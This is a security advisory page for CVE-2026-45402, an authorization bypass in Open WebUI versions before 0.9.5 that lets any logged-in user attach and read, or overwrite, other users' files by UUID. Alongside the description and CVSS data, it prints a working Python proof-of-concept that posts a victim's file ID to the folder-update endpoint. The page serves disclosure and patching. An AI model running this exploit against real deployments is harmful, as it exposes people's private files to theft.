Security Vulnerability Report
CVE-2026-45402 CVSS 8.1 HIGH

Published: 2026-05-15 21:16:38
Last Modified: 2026-05-15 23:16:21

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file's content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user's private file — and on the knowledge-base path, also to overwrite it — given knowledge of the file's UUID. This affects backend/open_webui/routers/folders.py (POST /api/v1/folders/{id}/update), backend/open_webui/routers/knowledge.py (add_file_to_knowledge_by_id), and backend/open_webui/routers/knowledge.py (add_files_to_knowledge_by_id_batch). This vulnerability is fixed in 0.9.5.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-45402: Open WebUI IDOR Vulnerability
# This script demonstrates how an authenticated user can attach another user's file to their folder.

TARGET_URL = "http://localhost:3000"
ATTACKER_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."  # Replace with valid JWT
VICTIM_FILE_ID = "550e8400-e29b-41d4-a716-446655440000"  # Replace with target file UUID
ATTACKER_FOLDER_ID = "123e4567-e89b-12d3-a456-426614174000"  # Replace with attacker's folder ID

headers = {
    "Authorization": f"Bearer {ATTACKER_TOKEN}",
    "Content-Type": "application/json",
}

# Exploit via /api/v1/folders/{id}/update
url = f"{TARGET_URL}/api/v1/folders/{ATTACKER_FOLDER_ID}/update"
payload = {
    "file_id": VICTIM_FILE_ID,
    "name": "Stolen File",
}

print(f"[*] Sending request to {url}...")
response = requests.post(url, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Success! File attached to attacker's folder.")
    print("[+] Attacker can now access the file content via RAG or download endpoints.")
else:
    print(f"[-] Failed with status code {response.status_code}")
    print(response.text)
```

Weakness

CWE-639 (Authorization Bypass Through User-Controlled Key)

References

https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f